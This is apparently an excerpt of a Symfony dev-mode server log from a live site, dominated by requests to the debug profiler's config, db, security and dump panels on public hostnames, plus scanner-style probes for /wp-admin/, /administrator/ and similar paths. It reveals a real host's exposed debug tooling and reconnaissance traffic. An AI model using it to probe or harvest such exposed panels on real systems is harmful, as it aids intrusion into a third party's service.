  9957. [2025-12-21 05:57:48] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"cc2d11","_route":"_profiler_router"},"request_uri":"https://web.unda.co/_profiler/cc2d11/router","method":"GET"} []
  9958. [2025-12-21 05:59:50] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"092da8","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/092da8/search/results?limit=10&method=GET","method":"GET"} []
  9959. [2025-12-21 05:59:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  9960. [2025-12-21 06:00:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9fab17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9fab17?panel=events","method":"GET"} []
  9961. [2025-12-21 06:00:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  9962. [2025-12-21 06:01:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b6bfa8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b6bfa8","method":"GET"} []
  9963. [2025-12-21 06:01:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  9964. [2025-12-21 06:02:45] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"d7ef7a","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/d7ef7a/search/results?ip=52.167.144.177&limit=10","method":"GET"} []
  9965. [2025-12-21 06:02:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=52.167.144.177&limit=10","method":"GET"} []
  9966. [2025-12-21 06:06:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  9967. [2025-12-21 06:12:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=logger","method":"GET"} []
  9968. [2025-12-21 06:12:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  9969. [2025-12-21 06:12:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=validator","method":"GET"} []
  9970. [2025-12-21 06:12:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  9971. [2025-12-21 06:14:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  9972. [2025-12-21 06:15:55] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
  9973. [2025-12-21 06:15:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  9974. [2025-12-21 06:16:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"49c3a7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/49c3a7?panel=config","method":"GET"} []
  9975. [2025-12-21 06:16:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  9976. [2025-12-21 06:21:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=db","method":"GET"} []
  9977. [2025-12-21 06:21:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  9978. [2025-12-21 06:25:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /SDK/webLanguage"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /SDK/webLanguage\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9979. [2025-12-21 06:26:28] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  9980. [2025-12-21 06:26:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  9981. [2025-12-21 06:26:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  9982. [2025-12-21 06:26:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  9983. [2025-12-21 06:26:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  9984. [2025-12-21 06:26:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  9985. [2025-12-21 06:26:28] security.DEBUG: Calling Authentication entry point. [] []
  9986. [2025-12-21 06:26:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  9987. [2025-12-21 06:26:31] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  9988. [2025-12-21 06:26:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  9989. [2025-12-21 06:26:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  9990. [2025-12-21 06:26:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  9991. [2025-12-21 06:26:31] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  9992. [2025-12-21 06:26:31] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  9993. [2025-12-21 06:26:31] security.DEBUG: Calling Authentication entry point. [] []
  9994. [2025-12-21 06:26:32] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  9995. [2025-12-21 06:26:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/" (from "http://admin.unda.co/wp-admin/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/\" (from \"http://admin.unda.co/wp-admin/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9996. [2025-12-21 06:26:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrator/" (from "http://admin.unda.co/administrator/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrator/\" (from \"http://admin.unda.co/administrator/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9997. [2025-12-21 06:26:39] request.INFO: Matched route "user_form". {"route":"user_form","route_parameters":{"uuid":"login","_controller":"Hona\\AdminBundle\\Controller\\UserController::userFormAction","_route":"user_form"},"request_uri":"https://admin.unda.co/user/login","method":"GET"} []
  9998. [2025-12-21 06:26:39] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  9999. [2025-12-21 06:26:39] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  10000. [2025-12-21 06:26:39] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  10001. [2025-12-21 06:26:39] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  10002. [2025-12-21 06:26:39] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  10003. [2025-12-21 06:26:39] security.DEBUG: Calling Authentication entry point. [] []
  10004. [2025-12-21 06:26:40] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2Fuser%2Flogin","method":"GET"} []
  10005. [2025-12-21 06:26:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin" (from "http://admin.unda.co/admin")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin\" (from \"http://admin.unda.co/admin\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  10006. [2025-12-21 06:26:44] request.INFO: Matched route "hona_admin_login_index". {"route":"hona_admin_login_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\LoginController::indexAction","_route":"hona_admin_login_index"},"request_uri":"https://admin.unda.co/login","method":"GET"} []
  10007. [2025-12-21 06:26:44] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  10008. [2025-12-21 06:26:44] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  10009. [2025-12-21 06:26:44] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  10010. [2025-12-21 06:26:44] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  10011. [2025-12-21 06:26:44] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  10012. [2025-12-21 06:26:44] security.DEBUG: Calling Authentication entry point. [] []
  10013. [2025-12-21 06:26:45] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2Flogin","method":"GET"} []
  10014. [2025-12-21 06:26:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /register" (from "http://admin.unda.co/register")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /register\" (from \"http://admin.unda.co/register\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  10015. [2025-12-21 06:26:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin" (from "http://admin.unda.co/admin")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin\" (from \"http://admin.unda.co/admin\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  10016. [2025-12-21 06:26:50] request.INFO: Matched route "hona_admin_login_index". {"route":"hona_admin_login_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\LoginController::indexAction","_route":"hona_admin_login_index"},"request_uri":"https://admin.unda.co/login","method":"GET"} []
  10017. [2025-12-21 06:26:50] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  10018. [2025-12-21 06:26:50] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  10019. [2025-12-21 06:26:50] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  10020. [2025-12-21 06:26:51] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  10021. [2025-12-21 06:26:51] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  10022. [2025-12-21 06:26:51] security.DEBUG: Calling Authentication entry point. [] []
  10023. [2025-12-21 06:26:52] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2Flogin","method":"GET"} []
  10024. [2025-12-21 06:27:33] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
  10025. [2025-12-21 06:27:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  10026. [2025-12-21 06:27:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=validator","method":"GET"} []
  10027. [2025-12-21 06:27:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  10028. [2025-12-21 06:30:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=validator","method":"GET"} []
  10029. [2025-12-21 06:30:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  10030. [2025-12-21 06:37:00] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6e6d61","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6e6d61/search/results?limit=10&method=GET","method":"GET"} []
  10031. [2025-12-21 06:37:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  10032. [2025-12-21 06:38:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=db","method":"GET"} []
  10033. [2025-12-21 06:38:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  10034. [2025-12-21 06:38:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=exception","method":"GET"} []
  10035. [2025-12-21 06:38:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  10036. [2025-12-21 06:38:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=logger","method":"GET"} []
  10037. [2025-12-21 06:38:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  10038. [2025-12-21 06:38:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b633d3","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/b633d3","method":"GET"} []
  10039. [2025-12-21 06:38:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  10040. [2025-12-21 06:39:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=cache","method":"GET"} []
  10041. [2025-12-21 06:39:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  10042. [2025-12-21 06:39:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=swiftmailer","method":"GET"} []
  10043. [2025-12-21 06:39:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  10044. [2025-12-21 06:39:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=router","method":"GET"} []
  10045. [2025-12-21 06:39:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  10046. [2025-12-21 06:39:01] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"7061e0","_route":"_profiler_router"},"request_uri":"https://web.unda.co/_profiler/7061e0/router","method":"GET"} []
  10047. [2025-12-21 06:39:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=events","method":"GET"} []
  10048. [2025-12-21 06:39:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  10049. [2025-12-21 06:39:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b633d3","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/b633d3?panel=time","method":"GET"} []
  10050. [2025-12-21 06:39:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  10051. [2025-12-21 06:39:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=validator","method":"GET"} []
  10052. [2025-12-21 06:39:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  10053. [2025-12-21 06:39:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=form","method":"GET"} []
  10054. [2025-12-21 06:39:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  10055. [2025-12-21 06:39:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=security","method":"GET"} []
  10056. [2025-12-21 06:39:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  10057. [2025-12-21 06:39:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  10058. [2025-12-21 06:40:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=time","method":"GET"} []
  10059. [2025-12-21 06:40:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  10060. [2025-12-21 06:40:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=config","method":"GET"} []
  10061. [2025-12-21 06:40:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  10062. [2025-12-21 06:40:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=twig","method":"GET"} []
  10063. [2025-12-21 06:40:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  10064. [2025-12-21 06:40:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=dump","method":"GET"} []
  10065. [2025-12-21 06:40:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
